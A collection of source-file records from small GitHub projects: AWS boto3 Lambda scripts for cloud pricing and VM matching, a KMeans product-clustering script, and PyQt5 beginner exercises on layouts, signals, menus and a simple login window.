"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 85, "num_lines": 37, "path": "/bluewhale_region_name_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Returns region NAMES not CODES. We need these for pricing API call.\n# A region name: 'US East (Ohio)'. A region code: 'us-east-2'\n\nfrom inspect import Parameter\nimport json\nimport boto3\n\ndef lambda_handler(event, context):\n\n # List all regions codes\n data = boto3.client('ec2').describe_regions(AllRegions=True)\n region_codes = []\n for r in data['Regions']:\n region_codes.append(r['RegionName'])\n while \"NextToken\" in data:\n data = boto3.client('ec2').describe_regions()\n for r in data['Regions']:\n region_codes.append(r['RegionName'])\n \n \n # Get all region names using the region codes\n client = boto3.client('ssm')\n region_names = []\n for region in region_codes:\n response = client.get_parameter(\n Name='/aws/service/global-infrastructure/regions/' + region + '/longName'\n )\n region_names.append(response['Parameter']['Value']) \n print(region_names)\n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(region_names)\n }\n" }, { "alpha_fraction": 0.5864537358283997, "alphanum_fraction": 0.607929527759552, "avg_line_length": 38.5, "blob_id": "fb45aca1ddf191a957382c2acdc9d977cfa1e51a", "content_id": "cdb401a14452c28cbf7e5b711eedea78327befe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1816, "license_type": "no_license", "max_line_length": 109, "num_lines": 46, "path": "/testing+data/ebs_pricing.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import boto3\nimport json\n\n# code modified from: https://medium.com/@stefanroman/calculate-price-of-ebs-volumes-with-python-76687bb24530\naws_region_map = {\n 'ca-central-1': 'Canada (Central)',\n 'ap-northeast-3': 'Asia Pacific (Osaka-Local)',\n 'us-east-1': 'US East (N. Virginia)',\n 'ap-northeast-2': 'Asia Pacific (Seoul)',\n 'us-gov-west-1': 'AWS GovCloud (US)',\n 'us-east-2': 'US East (Ohio)',\n 'ap-northeast-1': 'Asia Pacific (Tokyo)',\n 'ap-south-1': 'Asia Pacific (Mumbai)',\n 'ap-southeast-2': 'Asia Pacific (Sydney)',\n 'ap-southeast-1': 'Asia Pacific (Singapore)',\n 'sa-east-1': 'South America (Sao Paulo)',\n 'us-west-2': 'US West (Oregon)',\n 'eu-west-1': 'EU (Ireland)',\n 'eu-west-3': 'EU (Paris)',\n 'eu-west-2': 'EU (London)',\n 'us-west-1': 'US West (N. 
California)',\n 'eu-central-1': 'EU (Frankfurt)'\n }\nebs_name_map = {\n 'standard': 'Magnetic',\n 'gp2': 'General Purpose',\n 'io1': 'Provisioned IOPS',\n 'st1': 'Throughput Optimized HDD',\n 'sc1': 'Cold HDD'\n}\nregion = 'EU (Paris)'\n\npricing_auth = boto3.client('pricing', region_name=\"us-east-1\")\n\nfor ebs_code in ebs_name_map:\n response = pricing_auth.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_name_map[ebs_code]}, \n {'Type': 'TERM_MATCH', 'Field': 'location', 'Value': region}])\n for result in response['PriceList']:\n json_result = json.loads(result)\n for json_result_level_1 in json_result['terms']['OnDemand'].values():\n for json_result_level_2 in json_result_level_1['priceDimensions'].values():\n for price_value in json_result_level_2['pricePerUnit'].values():\n continue\n ebs_name_map[ebs_code] = float(price_value)\n print(ebs_name_map)" }, { "alpha_fraction": 0.6125080585479736, "alphanum_fraction": 0.6150870323181152, "avg_line_length": 35.9523811340332, "blob_id": "b5cd4a35f501da5b405f66288ac579804efef400", "content_id": "12af268e787f8f8349136feac0dbadd51eb86879", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1551, "license_type": "no_license", "max_line_length": 112, "num_lines": 42, "path": "/testing+data/ebs_details.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import json\nimport boto3\n\ndef ebs_refresh():\n\n \n # this is one of the few hard coded values, if a new category is updated, this will need to change\n ebs_categories = ['Magnetic', 'General Purpose', 'Provisioned IOPS', 'Throughput Optimized HDD', 'Cold HDD']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get all ebs products\n # this block is an API call that parses the json data\n ebs_details = []\n ebs_names = []\n for ebs_type in ebs_categories:\n response = [\"NextToken\"]\n while \"NextToken\" in response:\n response = pricing_client.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}])\n\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n name = priceItemJson['product'][\"attributes\"]['volumeApiName']\n if name not in ebs_names:\n ebs_names.append(name)\n ebs_details.append(priceItemJson)\n \n # we now have data about the volumes but need to parse out and only grab that data we want for the DB\n refresh_data = []\n # get the name and attributes for each!\n for details in ebs_details:\n ebs_data = details['product']['attributes']\n ebs_data['name'] = details['product']['attributes']['volumeApiName']\n ebs_data['provider'] = 'AWS'\n ebs_data['resource type'] = 'virtual disk'\n refresh_data.append(ebs_data)\n \n\n\n\nebs_refresh()" }, { "alpha_fraction": 0.5732159614562988, "alphanum_fraction": 0.5797034502029419, "avg_line_length": 35.2689094543457, "blob_id": "5c7928f507f5a6a264add46c1d3e118f77ae8b8d", "content_id": "63a88d65f93210caaf4b827adc91bbbe5f39f058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4316, "license_type": "no_license", "max_line_length": 141, "num_lines": 119, "path": "/bluewhale_vm_match.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: Match each GCP and Azure vm with up to 5 AWS matches. 
Add string set of AWS instance names to each 3rd party vm object in DynamoDB\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom boto3.dynamodb.conditions import Attr\n\n# this function can throttle DynamoDB\n# with 5 RCUs it takes about 26 minutes\n# with 250 RCUs it takes about 1.5 minutes\n\ndef match_vm(vm,t):\n # get vm specs\n vCPUs = vm['vCPUs']\n memory = vm['MemoryMB']\n type = vm['virtual machine type']\n\n # query for potential matches\n matches = t.scan(\n # virtual machine from AWS which has the same type and more or equal vCPUs and similar ram capacity\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type)\n & Attr('vCPUs').gte(vCPUs)\n # memory in range inf to (-20%)\n & Attr('MemoryMB').gte(int(float(memory) - (float(memory)*0.2)))\n )\n\n\n # edge case where AWS does not offer large enough instance in terms of vCPUs\n if not matches['Items']:\n # if this is the case, we will return the largest possible instance\n # get all of the specified type\n data = t.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq('AWS')\n & Attr('virtual machine type').eq(type) \n )\n if not data['Items']:\n return []\n # find the highest number of vCPUs for potential match\n values = [x['vCPUs'] for x in data['Items']]\n max_vCPUs = max(values)\n\n # add all instances of this largest size to a list\n largest_matches = []\n for instance in data['Items']:\n if instance['vCPUs'] == max_vCPUs:\n largest_matches.append(instance['name'])\n \n return largest_matches\n \n # find the lowest number of vCPUs for potential match\n values = [x['vCPUs'] for x in matches['Items']]\n min_vCPUs = min(values)\n\n\n # add all instances with that many vCPUs to list\n # find the lowest amount of memory at the same time\n matched_instances = []\n potential_matches = []\n for instance in matches['Items']:\n if instance['vCPUs'] == min_vCPUs:\n potential_matches.append(instance)\n\n # we now have the instances matched by vCPUs now we need to match by memory\n\n # we are going to try to find the 5 closest instances in memory\n for i in range(0,5):\n # while we still have options\n if potential_matches:\n # find the closest instance\n closest = min(potential_matches, key=lambda x:abs(x['MemoryMB']-vm['MemoryMB']))\n # add the instance to our final list\n matched_instances.append(closest['name'])\n \n # remove the closest from the potential matches so we can find the next closest\n potential_matches = [i for i in potential_matches if not (i['name'] == closest['name'])]\n \n # repeat 5x\n\n return matched_instances\n \n \ndef lambda_handler(event, context):\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp vm data\n third_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') & (Attr('provider').eq('Azure') or Attr('provider').eq('GCP'))\n )\n \n print(\"begin matching...\")\n counter = 0\n # add in the AWS matches to each vm!\n for vm in third_party_vm['Items']:\n counter = counter + 1\n print(str(counter) + ' ' + vm['name'])\n \n matches = match_vm(vm,table)\n table.update_item(\n Key={\n 'name': vm['name']\n },\n UpdateExpression=\"set AWS_matches=:a\",\n ExpressionAttributeValues={\n ':a': matches\n },\n ReturnValues=\"UPDATED_NEW\"\n )\n print(\"done!\")\n return {\n 'statusCode': 200,\n 
'body': json.dumps('Matching complete!')\n }\n" } ]
17
IVLIVSCAESAR44/KMeansClustering
https://github.com/IVLIVSCAESAR44/KMeansClustering
e0fc1e7124ba8037917f0b4d01b3616eec16a138
540b954363ddfdf7dcf492e460755b91dbbab494
0045dc8ab8c02341fb34cdf340ebb7ea41c071bd
refs/heads/main
2023-07-16T22:19:23.431049
2021-08-24T21:04:32
2021-08-24T21:04:32
399,601,456
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6959863305091858, "alphanum_fraction": 0.7028180956840515, "avg_line_length": 21.459999084472656, "blob_id": "83bb55b2cd55568118a7e0dda9605fee4deaa92f", "content_id": "5c5f20f51caba31613a327e57cd42c04c9816ca6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 75, "num_lines": 50, "path": "/KMeansClustering.py", "repo_name": "IVLIVSCAESAR44/KMeansClustering", "src_encoding": "UTF-8", "text": "import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\n#import sklearn.cluster.hierarchical as hclust\r\nfrom sklearn import preprocessing\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndf = pd.read_csv(r\"File to read data from\", encoding='latin1', sep = ',')\r\n\r\n\r\nfeatures = df.drop(['ASIN', 'Product Title'], 1)\r\n\r\ndata_scaled = preprocessing.normalize(features)\r\ndata_scaled = pd.DataFrame(data_scaled, columns = features.columns)\r\n\r\ninertia = []\r\n\r\nK = range(1,10)\r\nfor k in K:\r\n kmeanmodel = KMeans(n_clusters=k).fit(data_scaled)\r\n kmeanmodel.fit(data_scaled)\r\n inertia.append(kmeanmodel.inertia_)\r\n\r\nplt.plot(K, inertia, 'bx-')\r\nplt.xlabel('K')\r\nplt.ylabel('Inertia')\r\n\r\nplt.show()\r\n\r\n\r\nkmeans = KMeans(n_clusters=4).fit(data_scaled)\r\n\r\nclustered = pd.DataFrame(kmeans.labels_)\r\nclustered.columns= ['Cluster']\r\nclustered['ASIN'] = df['ASIN'].values\r\nclustered['Product Title'] = df['Product Title'].values\r\n\r\n\r\nClusteredProducts = pd.concat((features,clustered), 1, join='inner')\r\n\r\nClusteredProducts\r\n\r\n\r\nClusteredProducts.to_csv('Name of results file', encoding='utf-8', sep=',')\r\n\r\ndel df\r\ndel features\r\ndel data_scaled\r\ndel ClusteredProducts\r\ndel clustered" } ]
1
legendaryCJT/Learining
https://github.com/legendaryCJT/Learining
39699e01501c1b48fa424722c0073328b813b9c5
73c52e7330cc065c33617675bdeb513ac7c80279
7b181a9718123d7ede8f81923dd684871e7c2772
refs/heads/master
2020-09-28T14:07:54.834316
2019-12-09T05:53:09
2019-12-09T05:53:09
226,793,908
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4947395324707031, "alphanum_fraction": 0.5232229828834534, "avg_line_length": 26.881481170654297, "blob_id": "b457a39008677732f8929a7ea4924c14688495c5", "content_id": "54c5a2af3c81218020abb75e7ad3f35a34fbdd4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3967, "license_type": "no_license", "max_line_length": 76, "num_lines": 135, "path": "/PyQt5/Layout.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QWidget, QLabel, QApplication\r\nfrom PyQt5.QtWidgets import QPushButton, QHBoxLayout, QVBoxLayout\r\nfrom PyQt5.QtWidgets import QGridLayout, QMessageBox\r\nfrom PyQt5.QtWidgets import QLineEdit, QTextEdit # QLineEdit无法跨行,但可以在跨行居中显示\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example_absolute(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n lbl1 = QLabel(\"Zetcode\", self)\r\n lbl1.move(15, 10)\r\n\r\n lbl2 = QLabel(\"Tutorials\", self)\r\n lbl2.move(35, 40)\r\n\r\n lbl3 = QLabel(\"for programmers\", self)\r\n lbl3.move(55, 70)\r\n\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Absolute\")\r\n self.show()\r\n\r\n\r\nclass Example_layout(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n okButton = QPushButton(\"OK\")\r\n cancelButton = QPushButton(\"Cancel\")\r\n cancelButton.clicked.connect(self.close)\r\n\r\n hbox = QHBoxLayout()\r\n hbox.addStretch(1)\r\n hbox.addWidget(okButton)\r\n hbox.addWidget(cancelButton)\r\n\r\n vbox = QVBoxLayout()\r\n vbox.addStretch(1)\r\n vbox.addLayout(hbox)\r\n\r\n self.setLayout(vbox)\r\n # !!\r\n\r\n self.setGeometry(300, 300, 300, 150)\r\n self.setWindowTitle(\"Buttons\")\r\n self.show()\r\n\r\n\r\nclass Example_gridLayout(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n grid = QGridLayout()\r\n self.setLayout(grid)\r\n names = ['Cls', 'Bck', '', 'Close',\r\n '7', '8', '9', '/',\r\n '4', '5', '6', '*',\r\n '1', '2', '3', '-',\r\n '0', '.', '=', '+']\r\n positions = [(i, j) for i in range(5) for j in range(4)]\r\n for positions, name in zip(positions, names):\r\n if name == '':\r\n continue\r\n button = QPushButton(name)\r\n grid.addWidget(button, *positions)\r\n self.move(300, 150)\r\n self.setWindowTitle(\"Calculator\")\r\n self.show()\r\n\r\n\r\nclass Example_feedBack(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n title = QLabel('Title')\r\n author = QLabel('Name')\r\n review = QLabel('Review')\r\n\r\n titleEdit = QLineEdit()\r\n authorEdit = QLineEdit()\r\n reviewEdit = QTextEdit()\r\n\r\n sendButton = QPushButton(\"Send\")\r\n cancelButton = QPushButton(\"Cancel\")\r\n cancelButton.clicked.connect(self.close)\r\n # 这个使得全部窗口都退出了!!!\r\n\r\n\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n grid.addWidget(title, 1, 0)\r\n grid.addWidget(titleEdit, 1, 1, 1, 5)\r\n grid.addWidget(author, 2, 0)\r\n grid.addWidget(authorEdit, 2, 1, 1, 5)\r\n grid.addWidget(review, 3, 0)\r\n grid.addWidget(reviewEdit, 3, 1, 5, 5) # 5, 3 表示跨5行3列\r\n grid.addWidget(sendButton, 8, 4)\r\n grid.addWidget(cancelButton, 8, 5)\r\n self.setLayout(grid)\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowTitle(\"Feedback\")\r\n self.show()\r\n \r\n def closeBtn(self):\r\n reply = QMessageBox.question(self,\r\n \"Cancel\",\r\n \"Are you sure to cancel?\",\r\n 
QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n QCoreApplication.instance().quit()\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # ex1 = Example_absolute()\r\n ex2 = Example_layout()\r\n ex3 = Example_gridLayout()\r\n ex4 = Example_feedBack()\r\n sys.exit(app.exec())" }, { "alpha_fraction": 0.5885695219039917, "alphanum_fraction": 0.6026069521903992, "avg_line_length": 31.617977142333984, "blob_id": "b3048a9bfa2c26ba1e3a624ed812a9a3d064a5d2", "content_id": "e06696089ce1a4fcef5ae71b8b054b650534059d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3148, "license_type": "no_license", "max_line_length": 88, "num_lines": 89, "path": "/PyQt5/Home.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "from PyQt5.QtWidgets import (QApplication, QWidget, QPushButton, QLabel, QMessageBox,\r\n QLineEdit, QGridLayout)\r\nfrom PyQt5.QtGui import QIcon\r\nimport sys\r\n\r\n'''\r\nelf.lineEdit.setEchoMode(QLineEdit.Password) 设置密码隐藏\r\nself.lineEdit.setClearButtonEnabled(True) 设置对输入内容的删除提示\r\nself.lineEdit.setFixedSize() 总的设置控件大小\r\nself.lineEdit.setFixedWidth() 设置宽度\r\nself.lineEdit.setFixedHeight() 设置高度\r\nself.lineEdit.setFrame(False) 设置无边框\r\nself.lineEdit.text() 获得文本输入\r\nself.lineEdit.setText() 设置文本\r\nself.lineEdit.clear() 清除输入\r\nself.lineEdit.hide() 设置隐藏\r\nself.lineEdit.show() 设置展示\r\n调用QLineEdit的setPlaceholderText函数即可设置背景文字\r\n'''\r\n\r\nid = '圣雄肝帝'\r\npsw = '123456'\r\n\r\n\r\nclass LoginUI(QWidget):\r\n def __init__(self):\r\n super(LoginUI, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n idLabel = QLabel(\"ID: \", self)\r\n pswLabel = QLabel(\"Psw: \", self)\r\n\r\n self.idText = QLineEdit(self)\r\n self.idText.setPlaceholderText(\"Enter your ID\")\r\n self.pswText = QLineEdit(self)\r\n self.pswText.setPlaceholderText(\"Enter your Password\")\r\n self.pswText.setEchoMode(QLineEdit.Password)\r\n\r\n loginBtn = QPushButton(QIcon('./icon/user.png'), \"Login\", self)\r\n loginBtn.clicked.connect(self.loginTips)\r\n cancelBtn = QPushButton(\"Cancel\", self)\r\n cancelBtn.clicked.connect(self.closeBtn)\r\n\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n self.setLayout(grid)\r\n\r\n grid.addWidget(idLabel, 1, 0, 1, 1)\r\n grid.addWidget(self.idText, 1, 1, 1, 5)\r\n grid.addWidget(pswLabel, 2, 0, 1, 1)\r\n grid.addWidget(self.pswText, 2, 1, 1, 5)\r\n grid.addWidget(loginBtn, 3, 4)\r\n grid.addWidget(cancelBtn, 3, 5)\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowTitle(\"Login\")\r\n self.setWindowIcon(QIcon('./timg.jpg'))\r\n self.show()\r\n\r\n def closeEvent(self, event):\r\n reply = QMessageBox.question(self, \"Cancel\", \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n event.accept()\r\n else:\r\n event.ignore()\r\n\r\n def closeBtn(self):\r\n reply = QMessageBox.question(self, \"Cancel\", \"Are you sure to cancel?\",\r\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\r\n if reply == QMessageBox.Yes:\r\n # self.close()\r\n QApplication.quit()\r\n else:\r\n pass\r\n\r\n def loginTips(self):\r\n if self.idText.text() == id and self.pswText.text() == psw:\r\n QMessageBox.information(self, \"Aloha\", \"Login successfully\", QMessageBox.Ok)\r\n else:\r\n QMessageBox.information(self, \"Error\", \"Failed to login\", QMessageBox.Ok)\r\n print(self.idText.text(), self.pswText.text())\r\n\r\n\r\nif __name__ == '__main__':\r\n 
app = QApplication(sys.argv)\r\n ex = LoginUI()\r\n sys.exit(app.exec())\r\n" }, { "alpha_fraction": 0.5866032242774963, "alphanum_fraction": 0.6060245633125305, "avg_line_length": 26.189943313598633, "blob_id": "9704dbfcb4c92ca95ff534410efce0333f0e9ed4", "content_id": "562eda95dd1cac4084f6af281e8b20e186ae6dfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6472, "license_type": "no_license", "max_line_length": 77, "num_lines": 179, "path": "/PyQt5/Signals_and_Slots.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import (QWidget, QApplication, QVBoxLayout,\r\n QLabel, QGridLayout, QPushButton,\r\n QSlider, QLCDNumber, QStatusBar,\r\n QMainWindow)\r\nfrom PyQt5.QtCore import QObject, pyqtSignal\r\n\r\n# 新的模块: QtCore.Qt、 QtWidgets.QSlider, QtWidgets.QLCDNumber\r\n# QtCore.QObject,QtCore.pyqtSignal\r\n\r\n'''\r\n所有的应用都是事件驱动的。事件大部分都是由用户的行为产生的,\r\n当然事件也有其他的产生方式比如网络的连接,窗口管理器或者定时器等。\r\n调用应用的exec_()方法时,应用会进入主循环,主循环会监听和分发事件。\r\n\r\n在事件模型中,有三个角色:事件源、事件、事件目标\r\n事件源就是发生了状态改变的对象。事件是这个对象状态改变的内容。\r\n事件目标是事件想作用的目标。事件源绑定事件处理函数,然后作用于事件目标身上。\r\n\r\nPyQt5处理事件方面有个signal and slot机制。Signals and slots用于对象间的通讯。\r\n事件触发的时候,发生一个signal,slot是用来被Python调用的(就是相当于事件的绑定函数)\r\nslot只有在事件触发的时候才能调用。\r\n'''\r\n\r\n\r\nclass Example_SAS(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n lcd = QLCDNumber(self)\r\n sld = QSlider(Qt.Horizontal, self)\r\n\r\n vbox = QVBoxLayout()\r\n vbox.addWidget(lcd)\r\n vbox.addWidget(sld)\r\n\r\n self.setLayout(vbox)\r\n sld.valueChanged.connect(lcd.display)\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Signal and slot\")\r\n self.show()\r\n # 显示了QtGui.QLCDNumber和QtGui.QSlider模块,我们能拖动滑块让数字跟着发生改变。\r\n # sender是信号的发送者,receiver是信号的接收者,slot是对这个信号应该做出的反应。\r\n\r\n\r\nclass Example_EventHandler(QWidget):\r\n # 在PyQt5中,事件处理器经常被重写(也就是用自己的覆盖库自带的)。\r\n def __init__(self):\r\n super(Example_EventHandler, self).__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.setGeometry(300, 300, 250, 150)\r\n self.setWindowTitle(\"Event handler\")\r\n self.show()\r\n\r\n def keyPressEvent(self, event):\r\n if event.key() == Qt.Key_Escape:\r\n self.close()\r\n\r\n\r\n# 这个例子中,我们替换了事件处理器函数keyPressEvent()。\r\n# 按下ESC键程序就会退出。\r\n\r\n\r\nclass Example_EventObject(QWidget):\r\n # 事件对象是用python来描述一系列的事件自身属性的对象。\r\n def __init__(self):\r\n super(Example_EventObject, self).__init__()\r\n self.text = None\r\n self.label = None\r\n self.initUI()\r\n\r\n def initUI(self):\r\n grid = QGridLayout()\r\n grid.setSpacing(10)\r\n\r\n x = 0\r\n y = 0\r\n\r\n self.text = \"x: {0}, y: {1}\".format(x, y)\r\n self.label = QLabel(self.text, self)\r\n\r\n grid.addWidget(self.label, 0, 0, Qt.AlignTop)\r\n self.setLayout(grid)\r\n\r\n self.setMouseTracking(True)\r\n # 事件追踪默认没有开启,当开启后才会追踪鼠标的点击事件。\r\n self.setGeometry(300, 300, 350, 200)\r\n self.setWindowTitle(\"Event object\")\r\n self.show()\r\n\r\n def mouseMoveEvent(self, event):\r\n # event代表了事件对象。里面有我们触发事件(鼠标移动)的事件对象。\r\n # x()和y()方法得到鼠标的x和y坐标点,然后拼成字符串输出到QLabel组件里。\r\n x = event.x()\r\n y = event.y()\r\n self.text = \"x: {0}, y: {1}\".format(x, y)\r\n self.label.setText(self.text)\r\n # 这个示例中,我们在一个组件里显示鼠标的X和Y坐标。\r\n # Y坐标显示在QLabel组件里\r\n\r\n\r\nclass Example_EventSender(QMainWindow):\r\n # 有时候我们会想知道是哪个组件发出了一个信号,\r\n # PyQt5里的sender()方法能搞定这件事。\r\n def __init__(self):\r\n super().__init__()\r\n # self.status_bar = self.statusBar()\r\n self.status_bar = 
QStatusBar(self)\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.status_bar.showMessage(\"Ready\")\r\n btn1 = QPushButton(\"Button 1\", self)\r\n btn1.move(50, 50)\r\n\r\n btn2 = QPushButton(\"Button 2\", self)\r\n btn2.move(150, 50)\r\n\r\n btn1.clicked.connect(self.buttonClicked)\r\n btn2.clicked.connect(self.buttonClicked)\r\n # buttonClicked()方法决定了是哪个按钮能调用sender()方法。\r\n # 两个按钮都和同一个slot绑定。\r\n\r\n self.setWindowTitle(\"Event sender\")\r\n self.setGeometry(300, 300, 300, 200)\r\n self.setStatusBar(self.status_bar)\r\n self.show()\r\n\r\n def buttonClicked(self):\r\n sender = self.sender()\r\n self.status_bar.showMessage(sender.text() + ' was pressed')\r\n # 用调用sender()方法的方式决定了事件源。状态栏显示了被点击的按钮。\r\n\r\n # 似乎只有QMainWindow有状态栏\r\n # 状态栏既可以通过self.StatusBar()生成并展示\r\n # 也可以通过 self.stB = QStatusBar()生成后再由self.setStatusBar(self.stB)显示(否则显示异常)\r\n\r\n\r\nclass Communicate(QObject):\r\n closeApp = pyqtSignal()\r\n\r\n\r\n# 我们创建了一个叫closeApp的信号,这个信号会在鼠标按下的时候触发\r\n# 事件与QMainWindow绑定。\r\n# Communicate类创建了一个pyqtSignal()属性的信号。\r\n\r\n\r\nclass Example_EmitSignal(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.c = Communicate()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # self.c = Communicate()\r\n self.c.closeApp.connect(self.close)\r\n # closeApp信号QMainWindow的close()方法绑定。\r\n self.setGeometry(300, 300, 300, 150)\r\n self.setWindowTitle(\"Emit signal\")\r\n self.show()\r\n\r\n def mousePressEvent(self, event):\r\n self.c.closeApp.emit()\r\n # 点击窗口的时候,发送closeApp信号,程序终止。\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n # ex1 = Example_SAS()\r\n # ex2 = Example_EventHandler()\r\n # ex3 = Example_EventObject()\r\n # ex4 = Example_EventSender()\r\n ex5 = Example_EmitSignal()\r\n sys.exit(app.exec_())\r\n" }, { "alpha_fraction": 0.7714285850524902, "alphanum_fraction": 0.7714285850524902, "avg_line_length": 16.5, "blob_id": "4bfa6bc18c44c7ec544be2954fec8720dbb98384", "content_id": "3da5066157371ccb65a598744b76eebea06a9dd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/README.md", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "# Learning\nTo mark down my learing\n" }, { "alpha_fraction": 0.5661850571632385, "alphanum_fraction": 0.5720421671867371, "avg_line_length": 33.082191467285156, "blob_id": "025b8119afcf4ac191a8d9348de237f30c8f9c10", "content_id": "55348fcb260851a550d1a4743efae6b08477d4f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6428, "license_type": "no_license", "max_line_length": 89, "num_lines": 146, "path": "/PyQt5/Menu_and_ToolBar.py", "repo_name": "legendaryCJT/Learining", "src_encoding": "UTF-8", "text": "import sys\r\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\r\n# QMainWindow提供了主窗口的功能,使用它能创建一些简单的状态栏、工具栏和菜单栏。\r\nfrom PyQt5.QtWidgets import QAction, qApp\r\nfrom PyQt5.QtWidgets import QMenu\r\n# 子菜单中使用QMenu创建一个新菜单。\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtWidgets import QTextEdit\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtCore import QCoreApplication\r\n\r\n\r\nclass Example(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.status_bar = self.statusBar()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # self.status_bar = self.statusBar()\r\n self.status_bar.showMessage(\"App Ready\")\r\n # 调用QtGui.QMainWindow类的statusBar()方法,创建状态栏。\r\n # 
第一次调用创建一个状态栏,返回一个状态栏对象。\r\n # showMessage()方法在状态栏上显示一条信息。\r\n\r\n self.setGeometry(300, 300, 500, 300)\r\n self.setWindowIcon(QIcon('./timg.jpg'))\r\n self.setWindowTitle(\"Test\")\r\n\r\n exitAct = QAction(QIcon('./icon/exit.png'), '&Exit', self)\r\n # QAction是菜单栏、工具栏或者快捷键的动作的组合。\r\n # 先创建了一个图标、一个exit的标签和一个快捷键组合,都执行了一个动作。\r\n\r\n exitAct.setShortcut('Ctrl+Q')\r\n exitAct.setStatusTip('Exit application')\r\n # 在已有状态栏基础上,当鼠标悬停在菜单栏的时候,能改变状态栏显示当前状态。\r\n\r\n exitAct.triggered.connect(self.closeBtn)\r\n # exitAct.triggered.connect(QApplication.quit)\r\n # 这个事件跟QApplication的quit()行为相关联,上面两条语句等价?\r\n # 创建了只有一个命令的菜单file-exit,这个命令就是终止应用。\r\n # 同时也创建(不是,而是原先已有)了一个状态栏。还能使用快捷键Ctrl+Q退出应用。\r\n\r\n authorAct = QAction(QIcon('./icon/info.png'), \"Author\", self)\r\n authorAct.triggered.connect(self.authorTips)\r\n\r\n menu_bar = self.menuBar()\r\n fileMenu = menu_bar.addMenu('&File')\r\n moreMenu = menu_bar.addMenu('&More')\r\n # fileMenu.addAction(exitAct)\r\n # 创建了一个菜单栏,并在上面添加了一个file, more菜单.\r\n # file关联了点击退出应用的事件。\r\n newAct = 